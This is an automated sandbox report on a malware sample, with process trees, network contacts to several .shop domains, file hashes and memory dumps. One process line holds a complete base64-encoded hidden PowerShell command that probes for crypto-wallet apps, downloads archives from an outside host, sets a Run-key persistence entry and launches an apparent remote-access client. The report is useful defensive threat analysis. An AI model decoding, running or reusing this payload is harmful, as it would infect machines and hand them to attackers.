| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Set-up.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\more.com | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Set-up.exe
"C:\Users\Admin\AppData\Local\Temp\Set-up.exe"
C:\Windows\SysWOW64\more.com
C:\Windows\SysWOW64\more.com
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -exec bypass -f "C:\Users\Admin\AppData\Local\Temp\O93LZ727PJ79L0E0TL1CJ7.ps1"
C:\Users\Admin\AppData\Roaming\RDJUYV.pif
"C:\Users\Admin\AppData\Roaming\RDJUYV.pif" "C:\Users\Admin\AppData\Roaming\79AFBM.xlsx"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NOPrOF -Ep BYPAss -W hI -eNc JABlAGQASABIAGYAPQAnAGgASwBjAFUAOgBcAHMAbwBmAHQAVwBhAFIAZQBcAGMAbABhAFMAcwBlAHMAXAAnADsAIAAkAHcAQQBhAGoAPQAkAGUAbgBWADoATABPAGMAQQBsAGEAUABwAEQAQQB0AGEAKwAnAFwAcABSAE8AZwByAEEATQBTAFwAJwA7ACAAJAA5AHYAeABuADUAPQAoAEcARQBUAC0AVwBtAEkAbwBCAGoARQBjAFQAIAAtAEMATABhAHMAUwAgAFcAaQBOADMAMgBfAEMAbwBtAHAAVQB0AGUAcgBTAFkAcwB0AEUAbQApAC4AcABBAFIAVABPAGYAZABPAE0AQQBJAE4AOwAgACQAVgB2AHAAUwA9ADAAOwAgACQAVgA0AHQAbwBuAD0AJwBjADoAXABQAHIAbwBHAHIAQQBNACAARgBpAEwAZQBzAFwAJwA7ACAAJAByADUAUwB1AGkAPQAnAEgASwBMAE0AOgBcAFMATwBmAHQAdwBhAFIARQBcAGMATABBAHMAUwBFAFMAXAAnADsAIAAkAEUAawBRAGQAPQAnAGgAawBDAFUAOgBcAHMATwBmAHQAVwBBAHIARQBcACcAOwAgACQAWQBNAGMAegA9AEAAKAAgACQAdgA0AHQATwBOACsAJwBiAEkAVABiAE8AeABcAGIASQB0AGIAbwB4AC4ARQBYAEUAJwA7ACAAJABXAEEAYQBqACsAJwBDAFkAcABoAEUAcgBvAEMASwAgAEMAWQBTAHkATgBDAFwAQwB5AHAASABlAFIATwBDAEsAIABDAFkAcwB5AG4AQwAuAEUAWABlACcAOwAgACQARQBkAEgAaABmACsAJwBrAEUAZQBwAGsAZQBZACcAOwAgACQAVwBBAGEASgArACcAawBFAEUAdgBPAC0AVwBhAEwAbABlAFQAXABLAEUARQB2AE8AIABsAGkAbgBLAC4AZQBYAGUAJwA7ACAAJABWADQAVABvAE4AKwAnAGwAZQBEAGcAZQByACAAbABJAFYAZQBcAEwAZQBkAGcAZQBSACAAbABJAHYAZQAuAEUAeABlACcAOwAgACQAZQBrAFEAZAArACcAYgBJAFQAQgBvAFgAYQBwAFAAJwA7ACAAJAB3AEEAQQBqACsAJwBUAFIARQBaAE8AUgAgAFMAVQBpAFQAZQBcAFQAUgBFAHoAbwByACAAUwBVAEkAVABFAC4AZQBYAEUAJwA7ACAAJAB3AGEAYQBqACsAJwBSAGEAYgBCAHkALQBkAEUAUwBLAHQATwBwAFwAcgBBAGIAQgB5ACAARABlAHMASwBUAG8AcAAuAEUAWABFACcAOwAgACQARQBLAHEAZAArACcAbQBJAGMAUgBvAFMAbwBmAFQAXABXAGkATgBEAE8AdwBTAFwAYwB1AFIAUgBlAE4AdABWAEUAcgBzAGkATwBuAFwAdQBOAGkAbgBzAHQAQQBMAEwAXABCAGkAdABiAG8AWABBAFAAUAAnADsAIAAkAFIANQBzAFUASQArACcAbABFAGQAZwBlAFIAbABpAFYARQAnADsAIAAkAEUARABoAEgAZgArACcAYQBvAHAAcAAnADsAIAAkAEUARABoAEgARgArACcAVABSAGUAWgBPAHIAcwBVAEkAdABFACcAOwAgACQAdgA0AFQAbwBOACsAJwBiAEMAIABWAEEAVQBMAHQAXABCAGMAVgBhAFUATABUAC4ARQBYAGUAJwA7ACAAJAByADUAUwB1AEkAKwAnAEIAQwB2AGEAdQBsAHQAJwA7ACAAJABXAGEAYQBqACsAJwBLAGUAZQBwAEsAZQBZAC0ARABFAFMAawB0AE8AUABcAEsARQBFAHAAawBFAHkAIABEAGUAcwBrAFQAbwBQAC4AZQB4AEUAJwA7ACAAJABFAEsAcQBEACsAJwByAEUAQQBMACAAcwBlAGMAdQByAGkAdABZAFwAYgBDAHYAYQB1AEwAdAAnADsAIAAkAEUAZABoAGgARgArACcASwBlAEUAVgBPACcAOwAgACQARQBEAEgAaABGACsAJwBMAGkAUQBVAGkAZABuAGUAdABXAG8AcgBrACcAOwAgACQARQBkAEgASABGACsAJwBDAFkAUABoAEUAcgBPAEMASwAnADsAIAAkAGUARABIAEgARgArACcAbwBuAEUAawBFAFkALQB3AEEAbABsAGUAVAAnADsAIAAkAHYANAB0AG8ATgArACcAQgBMAG8AYwBrAFMAVAByAGUAYQBtAFwAYgBsAE8AQwBLAFMAdAByAGUAQQBNACAAZwByAEUARQBuAFwAQgBMAG8AQwBLAFMAdABSAGUAYQBNACAARwBSAEUAZQBuAC4AZQBYAGUAJwA7ACAAJABWADQAdABPAE4AKwAnAE8AbgBlAEsARQBZAFwAbwBuAEUAawBlAHkALgBlAHgAZQAnADsAIAApADsAIAAkAGgATgBvAHoAPQAkAFkAbQBDAFoALgBsAEUATgBHAFQAaAA7ACAAaQBGACAAKAAkADkAdgB4AE4ANQApACAAewAkAHYAdgBwAFMAPQAxAH0AIABFAEwAcwBlACAAewAgAGYAbwByACAAKAAkAE0AOQBwAHcAQQA9ADAAOwAgACQAbQA5AFAAdwBhACAALQBMAHQAIAAkAEgATgBPAHoAIAAtAGEATgBEACAAJAB2AFYAUABTACAALQBFAHEAIAAwADsAIAAkAE0AOQBQAHcAYQArACsAKQAgAHsAIABJAEYAIAAoAHQARQBzAFQALQBwAGEAdABoACAAJAB5AE0AQwBaAFsAJABtADkAUAB3AGEAXQApACAAewAkAFYAdgBQAHMAPQAxAH0AOwB9ADsAfQA7ACAASQBmACAAKAAkAHYAdgBwAHMAIAAtAGUAcQAgADEAKQAgAHsAIABDAGgAZABpAFIAIAAkAEUAbgB2ADoAQQBQAFAAZABBAFQAYQA7ACAAJABSAFIAUgBFAGUAZgBIAEcAPQBnAGUAdAAtAGMATwBtAG0AYQBuAEQAIABFAHgAcABBAG4ARAAtAGEAUgBDAEgASQB2AEUAIAAtAEUAUgByAE8AUgBBAGMAdABJAG8AbgAgAHMAaQBMAEUATgBUAGwAeQBjAE8ATgB0AEkAbgBVAEUAOwAgACQAdABsAGUAUQByAFkAPQAnAGgAdAB0AHAAcwA6AC8ALwBtAGkAbgBkAGYAdQBzAHQAZQBwAHMALgBzAGgAbwBwAC8AbQBpAG4AegAvAG0ANABuAGQALgB6AGkAcAAnADsAIAAkAFYAagByAEYAdABDAGcARwA9ACcAaAB0AHQAcABzADoALwAvAG0AaQBuAGQAZgB1AHMAdABlAHAAcwAuAHMAaABvAHAALwBtAGkAbgB6AC8AbQAyAG4AZAAuAHoAaQBwACcAOwAgACQAYgBFAHoAZwBqAHYAUQBJAD0AJwB2AGQAZgBvAHIANABoAHEALgB6AGkAcAAnADsAIAAkAHkAWABDAFAAZQBNAFEAUgA9AEcAQwBNACAAUwB0AGEAUgB0AC0AYgBpAHQAcwBUAFIAQQBuAFMAZgBFAFIAIAAtAEUAcgBSAG8AUgBhAEMAVABJAE8ATgAgAHMAaQBMAGUATgBUAGwAeQBDAE8AbgB0AEkATgBVAGUAOwAgACQAOABHAFEAOQBuAHQAPQAnAGgAdAB0AHAAcwA6AC8ALwBtAGkAbgBkAGYAdQBzAHQAZQBwAHMALgBzAGgAbwBwAC8AbQBpAG4AegAvAG0AMwBuAGQALgB6AGkAcAAnADsAIAAkADgAVABnAHEAMwBFADUAPQAnADMAcQBvADMARgBjAE8ALgB6AGkAcAAnADsAIAAkAGcARwBCAEQAcgBuAGwAPQAnAFMAbQBhAHIAdABEAGUAZgByAGEAZwBUAG8AbwBsACcAOwAgACQASgBmAEMAaQBuAEcAPQAnADEAYQBLAEgAeABQAEIALgB6AGkAcAAnADsAIABbAE4AZQB0AC4AcwBlAHIAdgBpAGMAZQBwAE8ASQBOAFQAbQBBAE4AYQBHAGUAcgBdADoAOgBTAEUAYwBVAFIAaQBUAHkAUAByAE8AdABvAEMATwBsACAAPQAgAFsATgBlAHQALgBTAGUAYwBVAHIAaQBUAHkAcAByAE8AdABvAGMAbwBsAHQAWQBQAGUAXQA6ADoAdABMAHMAMQAyADsAIAAkAHUARgBHADkAYgA3AGoAegA9ACcAbQBBAEwAbABRAEEALgB6AGkAcAAnADsAIAAkAGIAOAA3AE4AOQB1AD0AJwBoAHQAdABwAHMAOgAvAC8AbQBpAG4AZABmAHUAcwB0AGUAcABzAC4AcwBoAG8AcAAvAG0AaQBuAHoALwBtADEAbgBkAC4AegBpAHAAJwA7ACAAJABVAHAAeABlAHcANgBGAD0AIgAkAGUATgBWADoAYQBQAFAARABBAHQAYQBcACQAOABUAGcAcQAzAEUANQAiADsAIAAkAHQAagBlADYAZwAzAD0AJABFAE4AVgA6AGEAcABQAGQAQQB0AEEALAAgACQAYgBFAHoAZwBqAHYAUQBJACAALQBqAG8AaQBOACAAJwBcACcAOwAgACQAMwBzAFUASABFAFgAbwA9ACIAJABFAE4AdgA6AGEAUABQAGQAYQBUAGEAXAAkAEoAZgBDAGkAbgBHACIAOwAgACQANAA1AFkASgBXAHkAQgA9ACIAewAwAH0AXAB7ADEAfQAiACAALQBmACAAJABFAE4AdgA6AGEAUABQAGQAYQBUAGEALAAgACQAdQBGAEcAOQBiADcAagB6ADsAIAAkAEEAcgBNAFgASQByAFkAdgA9ACIAYgBpAHQAcwBhAEQAbQBJAE4ALgBlAFgAZQAgAC8AVAByAEEAbgBzAGYARQByACAANgBEAHIAeQA2AGgAcABvACAALwBEAE8AdwBuAGwATwBBAEQAIAAvAFAAUgBpAE8AcgBJAFQAWQAgAG4AbwBSAE0AYQBsACAAJABWAGoAcgBGAHQAQwBnAEcAIAAkAFUAcAB4AGUAdwA2AEYAIgA7ACAAJAAxAG0AcABoAHUAVABTAGkAPQAiACQARQBuAFYAOgBhAHAAcABEAGEAdABBAFwAJABnAEcAQgBEAHIAbgBsACIAOwAgACQAQwBLAGcAbABkAFYAPQAiAGIAaQBUAFMAQQBkAG0AaQBOAC4ARQB4AEUAIAAvAHQAUgBhAE4AcwBmAGUAcgAgADAAbQAxAFkAcwBMADcAIAAvAGQATwB3AG4ATABvAEEAZAAgAC8AUAByAEkAbwByAEkAVABZACAATgBvAFIAbQBBAGwAIAAkADgARwBRADkAbgB0ACAAJAB0AGoAZQA2AGcAMwAiADsAIAAkAHUARQB4AFoANgBSAFAARAA9ACcAYgBJAFQAUwBhAGQATQBpAG4ALgBlAHgAZQAgAC8AdABSAEEAbgBTAGYARQBSACAAcABYAFIAUABEAGYAdAAgAC8ARABvAFcATgBsAG8AQQBkACAALwBwAFIASQBvAFIASQB0AFkAIABuAE8AcgBtAGEAbAAgACcAKwAkAGIAOAA3AE4AOQB1ACsAJwAgACcAKwAkADMAcwBVAEgARQBYAG8AOwAgACQAcABGADcASAA1AEoAVQA9ACIAYgBJAFQAUwBhAGQATQBpAG4ALgBlAHgAZQAgAC8AdABSAEEAbgBTAGYARQBSACAAcABYAFIAUABEAGYAdAAgAC8ARABvAFcATgBsAG8AQQBkACAALwBwAFIASQBvAFIASQB0AFkAIABuAE8AcgBtAGEAbAAgAHsAMAB9ACAAewAxAH0AIgAgAC0AZgAgACQAYgA4ADcATgA5AHUALAAgACQANAA1AFkASgBXAHkAQgA7ACAASQBmACAAKAAkAFIAUgBSAEUAZQBmAEgARwApACAAewAgAEkARgAgACgAJAB5AFgAQwBQAGUATQBRAFIAKQAgAHsAIABTAHQAYQByAHQALQBCAEkAVABTAHQAcgBhAE4AUwBmAGUAUgAgAC0AUwBvAFUAcgBjAGUAIAAkAFYAagByAEYAdABDAGcARwAgAC0ARABlAHMAdABJAG4AQQB0AEkATwBuACAAJABVAHAAeABlAHcANgBGADsAIABzAFQAYQByAHQALQBCAEkAVABzAHQAUgBBAE4AUwBGAEUAUgAgAC0AcwBPAHUAUgBjAEUAIAAkADgARwBRADkAbgB0ACAALQBkAEUAUwBUAGkAbgBBAFQAaQBvAG4AIAAkAHQAagBlADYAZwAzADsAIABzAFQAQQByAHQALQBiAEkAVABTAHQAcgBBAE4AUwBmAEUAUgAgAC0AcwBvAFUAcgBjAEUAIAAkAGIAOAA3AE4AOQB1ACAALQBEAEUAcwBUAEkATgBhAHQASQBPAE4AIAAkADMAcwBVAEgARQBYAG8AOwAgAHMAVABBAFIAVAAtAEIAaQBUAHMAdABSAGEAbgBTAEYARQByACAALQBzAE8AdQBSAGMARQAgACQAdABsAGUAUQByAFkAIAAtAEQARQBzAFQAaQBuAGEAdABpAG8ATgAgACQANAA1AFkASgBXAHkAQgA7ACAAfQAgAEUAbABTAEUAIAB7AGkARQBYACAALQBjAG8AbQBtAGEATgBEACAAJAB1AEUAeABaADYAUgBQAEQAOwAgAEkARQBYACAALQBDAG8AbQBtAEEAbgBEACAAJABwAEYANwBIADUASgBVADsAIABpAGUAeAAgAC0AYwBvAG0AbQBhAG4AZAAgACQAQQByAE0AWABJAHIAWQB2ADsAIAAmACAAJABDAEsAZwBsAGQAVgA7ACAAfQAgAEUAeABwAEEATgBEAC0AQQByAGMAaABpAFYAZQAgAC0AUABBAFQAaAAgACQANAA1AFkASgBXAHkAQgAgAC0ARABlAFMAdABJAE4AYQBUAEkAbwBuAFAAYQB0AGgAIAAkADEAbQBwAGgAdQBUAFMAaQA7ACAARQB4AHAAQQBOAEQALQBhAFIAYwBoAGkAVgBFACAALQBQAGEAdABIACAAJAB0AGoAZQA2AGcAMwAgAC0AZABlAHMAdABpAG4AYQBUAEkAbwBOAHAAYQB0AGgAIAAkADEAbQBwAGgAdQBUAFMAaQA7ACAARQB4AFAAQQBOAGQALQBBAFIAQwBIAGkAdgBFACAALQBwAEEAdABIACAAJAAzAHMAVQBIAEUAWABvACAALQBkAEUAUwBUAGkAbgBhAFQAaQBPAE4AcABBAHQASAAgACQAMQBtAHAAaAB1AFQAUwBpADsAIABlAHgAUABBAG4AZAAtAEEAcgBDAGgAaQBWAGUAIAAtAHAAYQB0AGgAIAAkAFUAcAB4AGUAdwA2AEYAIAAtAEQAZQBTAFQAaQBuAGEAdABpAG8ATgBwAEEAdABIACAAJAAxAG0AcABoAHUAVABTAGkAOwAgAFIAbQAgAC0AUABhAFQAaAAgACQAdABqAGUANgBnADMAOwAgAFIARAAgAC0AcABBAFQASAAgACQAVQBwAHgAZQB3ADYARgA7ACAAUgBEACAALQBwAEEAdABIACAAJAA0ADUAWQBKAFcAeQBCADsAIAByAGUATQBPAHYAZQAtAEkAdABlAG0AIAAtAFAAQQBUAGgAIAAkADMAcwBVAEgARQBYAG8AOwAgAH0AIABFAEwAUwBFACAAewAgACQAWgBBAFAAUABmAHQAPQBAACgAJwBwAGMAaQBjAGEAcABpAC4AZABsAGwAJwAsACAAJwBjAGwAaQBlAG4AdAAzADIALgBpAG4AaQAnACwAIAAnAFQAQwBDAFQATAAzADIALgBEAEwATAAnACwAIAAnAG4AcwBtAF8AdgBwAHIAbwAuAGkAbgBpACcALAAgACcATgBTAE0ALgBMAEkAQwAnACwAIAAnAEgAVABDAFQATAAzADIALgBEAEwATAAnACwAIAAnAHIAZQBtAGMAbQBkAHMAdAB1AGIALgBlAHgAZQAnACwAIAAnAEEAdQBkAGkAbwBDAGEAcAB0AHUAcgBlAC4AZABsAGwAJwAsACAAJwBuAHMAawBiAGYAbAB0AHIALgBpAG4AZgAnACwAIAAnAFAAQwBJAEMASABFAEsALgBEAEwATAAnACwAIAAnAFAAQwBJAEMATAAzADIALgBEAEwATAAnACwAIAAnAGMAbABpAGUAbgB0ADMAMgAuAGUAeABlACcALAAgACcAbQBzAHYAYwByADEAMAAwAC4AZABsAGwAJwApADsAIABuAGkAIAAtAFAAQQBUAGgAIAAkAEUAbgB2ADoAYQBQAHAAZABBAHQAQQAgAC0AbgBBAG0AZQAgACQAZwBHAEIARAByAG4AbAAgAC0AaQBUAGUATQBUAHkAUABlACAAJwBkAGkAcgBlAGMAdABvAHIAeQAnADsAIAAkAGcAMQBpADUAcgB4AEIAPQAnAGgAdAB0AHAAcwA6AC8ALwBtAGkAbgBkAGYAdQBzAHQAZQBwAHMALgBzAGgAbwBwAC8AbQBpAG4AZAAvACcAOwAgAEkARgAgACgAJAB5AFgAQwBQAGUATQBRAFIAKQAgAHsAIAAkAFoAQQBQAFAAZgB0ACAAfAAgAEYAbwBSAEUAQQBjAGgALQBPAEIAagBFAEMAdAAgAHsAIAAkAGgARQBWAFQARwB1AHEAbwA9ACQAZwAxAGkANQByAHgAQgArACQAXwA7ACAAJABTAE0ASgBLAE4AUAA9AGoATwBJAE4ALQBwAEEAdABoACAALQBQAEEAdABoACAAJAAxAG0AcABoAHUAVABTAGkAIAAtAGMASABpAGwARABQAGEAVABoACAAJABfADsAIABzAHQAYQBSAHQALQBiAEkAVABTAHQAcgBhAG4AUwBGAEUAUgAgAC0AcwBPAHUAcgBDAGUAIAAkAGgARQBWAFQARwB1AHEAbwAgAC0AZABFAHMAVABpAG4AQQBUAGkAbwBOACAAJABTAE0ASgBLAE4AUAA7ACAAfQA7AH0AIABlAEwAUwBFACAAewAgACQAWgBBAFAAUABmAHQAIAB8ACAAZgBvAFIARQBhAEMASAAtAG8AQgBKAEUAQwBUACAAewAgACQAaABFAFYAVABHAHUAcQBvAD0AJABnADEAaQA1AHIAeABCACsAJABfADsAIAAkAFMATQBKAEsATgBQAD0AJAAxAG0AcABoAHUAVABTAGkALAAgACQAXwAgAC0AagBPAEkATgAgACcAXAAnADsAIAAkAHAAUgBsAHIAYQBhAFoAQwA9ACcAQgBpAHQAUwBhAGQAbQBJAE4ALgBlAHgARQAgAC8AdAByAEEAbgBTAGYARQByACAANgBMAFAAdAA4AEsAMgBnACAALwBkAG8AVwBuAGwAbwBBAGQAIAAvAFAAUgBJAE8AUgBJAFQAeQAgAE4ATwByAE0AQQBMACAAJwArACQAaABFAFYAVABHAHUAcQBvACsAJwAgACcAKwAkAFMATQBKAEsATgBQADsAIABJAEUAWAAgAC0AQwBvAG0AbQBBAG4ARAAgACQAcABSAGwAcgBhAGEAWgBDADsAfQA7ACAAfQA7ACAAfQA7ACAAJAB5AEYAaAB6AEYATAA9AEcASQAgACQAMQBtAHAAaAB1AFQAUwBpACAALQBmAG8AcgBDAGUAOwAgACQAeQBGAGgAegBGAEwALgBhAFQAVABSAGkAYgB1AHQARQBzAD0AJwBIAGkAZABkAGUAbgAnADsAIABDAGgAZABpAFIAIAAkADEAbQBwAGgAdQBUAFMAaQA7ACAAJABYAEMAVQBGAGcAYwBxAD0AIgAkADEAbQBwAGgAdQBUAFMAaQBcAGMAbABpAGUAbgB0ADMAMgAuAGUAeABlACIAOwAgAE4ARQBXAC0ASQB0AEUAbQBwAFIAbwBwAGUAUgBUAHkAIAAtAFAAYQB0AEgAIAAnAEgASwBDAHUAOgBcAHMAbwBGAFQAdwBBAFIAZQBcAE0ASQBDAHIAbwBzAG8ARgB0AFwAdwBpAE4ARABPAFcAUwBcAGMAVQBSAHIARQBuAFQAVgBFAFIAcwBJAE8ATgBcAHIAdQBuACcAIAAtAG4AQQBtAGUAIAAkAGcARwBCAEQAcgBuAGwAIAAtAHYAYQBsAFUAZQAgACQAWABDAFUARgBnAGMAcQAgAC0AUAByAE8AUABFAHIAdAB5AHQAeQBwAGUAIAAnAFMAdAByAGkAbgBnACcAOwAgAFMAdABhAHIAdAAtAFAAUgBPAEMAZQBTAFMAIABjAGwASQBFAG4AdAAzADIALgBFAFgAZQA7ACAAfQA7AA==
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.163.202.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | mindfuljournal.shop | udp |
| US | 172.67.143.13:443 | mindfuljournal.shop | tcp |
| US | 172.67.143.13:443 | mindfuljournal.shop | tcp |
| US | 172.67.143.13:443 | mindfuljournal.shop | tcp |
| US | 8.8.8.8:53 | 13.143.67.172.in-addr.arpa | udp |
| US | 172.67.143.13:443 | mindfuljournal.shop | tcp |
| US | 172.67.143.13:443 | mindfuljournal.shop | tcp |
| US | 172.67.143.13:443 | mindfuljournal.shop | tcp |
| US | 8.8.8.8:53 | cdn1.pixel-story.shop | udp |
| US | 104.21.32.85:443 | cdn1.pixel-story.shop | tcp |
| US | 8.8.8.8:53 | pixelpalette.shop | udp |
| US | 104.21.84.104:443 | pixelpalette.shop | tcp |
| US | 8.8.8.8:53 | 85.32.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.84.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | mindfusteps.shop | udp |
| MD | 213.159.73.34:443 | mindfusteps.shop | tcp |
| US | 8.8.8.8:53 | 34.73.159.213.in-addr.arpa | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 104.82.234.109:443 | steamcommunity.com | tcp |
| AM | 217.144.184.19:1466 | tcp | |
| US | 8.8.8.8:53 | 109.234.82.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.184.144.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| AM | 217.144.184.19:1466 | tcp |
Files
memory/1852-0-0x0000000074550000-0x00000000747E1000-memory.dmp
memory/1852-1-0x00007FFC453F0000-0x00007FFC455E5000-memory.dmp
memory/1852-8-0x0000000074563000-0x0000000074565000-memory.dmp
memory/1852-9-0x0000000074550000-0x00000000747E1000-memory.dmp
memory/1852-10-0x0000000074550000-0x00000000747E1000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\13821335
| MD5 | f7b47df6923eabe96417f277c97f32bf |
| SHA1 | b031c79c7b8a2585d6c1eff80674b09eca5fc154 |
| SHA256 | bbb3a5fa0a62a0c0c33b053b506866b62511f21966a4dd6777bb70a2c4b7267d |
| SHA512 | 54f9584215ba5b1646b1c7d0f23c14793de4831c01214ca9f5828235dc366cbbdaeecc0b940a5ca3df4d458c14e7a881d9528671ef8bcc37baf758a6073914b4 |
memory/4192-12-0x0000000074550000-0x00000000747E1000-memory.dmp
memory/4192-14-0x00007FFC453F0000-0x00007FFC455E5000-memory.dmp
memory/4192-15-0x0000000074550000-0x00000000747E1000-memory.dmp
memory/4192-16-0x0000000074550000-0x00000000747E1000-memory.dmp
memory/4192-18-0x0000000074550000-0x00000000747E1000-memory.dmp
memory/4688-19-0x00007FFC453F0000-0x00007FFC455E5000-memory.dmp
memory/4688-20-0x00000000003D0000-0x0000000000429000-memory.dmp
memory/4688-21-0x0000000000BBF000-0x0000000000BC7000-memory.dmp
memory/4688-25-0x00000000003D0000-0x0000000000429000-memory.dmp
memory/3248-27-0x00000000748BE000-0x00000000748BF000-memory.dmp
memory/3248-28-0x0000000002960000-0x0000000002996000-memory.dmp
memory/3248-35-0x00000000748B0000-0x0000000075060000-memory.dmp
memory/4688-30-0x0000000003D20000-0x0000000003D59000-memory.dmp
memory/3248-36-0x0000000005130000-0x0000000005758000-memory.dmp
memory/4688-29-0x0000000003D20000-0x0000000003D59000-memory.dmp
memory/3248-37-0x0000000004F60000-0x0000000004F82000-memory.dmp
memory/3248-38-0x0000000005760000-0x00000000057C6000-memory.dmp
memory/3248-39-0x00000000057D0000-0x0000000005836000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zuemf0qc.2fv.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3248-49-0x0000000005940000-0x0000000005C94000-memory.dmp
memory/3248-50-0x0000000005F10000-0x0000000005F2E000-memory.dmp
memory/3248-51-0x0000000005FC0000-0x000000000600C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\O93LZ727PJ79L0E0TL1CJ7.ps1
| MD5 | a93ef812fcdf3af24ff8b33a75d4992e |
| SHA1 | b282892bd321a8709474f43d790d7e661edaa98f |
| SHA256 | d5a89ca10e0e354df724efa955616b27501534cd5153f3c387c9d569a73cdbc6 |
| SHA512 | 272da3e9cb498541454f381d360e4dd47498ecf1f604844dcaea21316a3f37547688f52439d38bb6208f513ba8fc9e442b82cbb622c6579323530c342853b037 |
memory/3248-53-0x0000000007770000-0x0000000007DEA000-memory.dmp
memory/3248-54-0x0000000006460000-0x000000000647A000-memory.dmp
memory/3248-55-0x00000000748BE000-0x00000000748BF000-memory.dmp
memory/3248-56-0x00000000748B0000-0x0000000075060000-memory.dmp
memory/4688-57-0x00000000003D0000-0x0000000000429000-memory.dmp
C:\Users\Admin\AppData\Roaming\RDJUYV.pif
| MD5 | 3f58a517f1f4796225137e7659ad2adb |
| SHA1 | e264ba0e9987b0ad0812e5dd4dd3075531cfe269 |
| SHA256 | 1da298cab4d537b0b7b5dabf09bff6a212b9e45731e0cc772f99026005fb9e48 |
| SHA512 | acf740aafce390d06c6a76c84e7ae7c0f721731973aadbe3e57f2eb63241a01303cc6bf11a3f9a88f8be0237998b5772bdaf569137d63ba3d0f877e7d27fc634 |
C:\Users\Admin\AppData\Roaming\79AFBM.xlsx
| MD5 | 3c6d0866e54ab391bc09713fde4c9d38 |
| SHA1 | a1a4e9c067e3c85739e85fb45f7ecdb363bcf856 |
| SHA256 | ffe15bff44969541749b01e1ab80492c95990bf4af35fb62e0d93bf6a4b81682 |
| SHA512 | eebf8ca2e3d778ca9706276b26c4d3daedf9cb7067d695cbf9e07755e6887e782d25a8aa6785034052b39105518c69f7e09b12c8199e58d13fcaf6b7f82b58b4 |
memory/4012-67-0x0000000000400000-0x00000000009BA000-memory.dmp
memory/4012-68-0x0000000000400000-0x00000000009BA000-memory.dmp
memory/4012-71-0x0000000000400000-0x00000000009BA000-memory.dmp
memory/4012-70-0x0000000000400000-0x00000000009BA000-memory.dmp
memory/4012-69-0x0000000000400000-0x00000000009BA000-memory.dmp
memory/4012-82-0x0000000000400000-0x00000000009BA000-memory.dmp
memory/3260-83-0x0000000007550000-0x00000000075E6000-memory.dmp
memory/3260-84-0x0000000007520000-0x0000000007542000-memory.dmp
memory/3260-85-0x0000000007BA0000-0x0000000008144000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | 5315900105942deb090a358a315b06fe |
| SHA1 | 22fe5d2e1617c31afbafb91c117508d41ef0ce44 |
| SHA256 | e8bd7d8d1d0437c71aceb032f9fb08dd1147f41c048540254971cc60e95d6cd7 |
| SHA512 | 77e8d15b8c34a1cb01dbee7147987e2cc25c747e0f80d254714a93937a6d2fe08cb5a772cf85ceb8fec56415bfa853234a003173718c4229ba8cfcf2ce6335a6 |
memory/3248-91-0x00000000748B0000-0x0000000075060000-memory.dmp
memory/4012-92-0x0000000000400000-0x00000000009BA000-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-11-13 15:17
Reported
2024-11-13 15:20
Platform
win7-20240903-en
Max time kernel
120s
Max time network
121s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\regsvr32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2292 wrote to memory of 2192 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
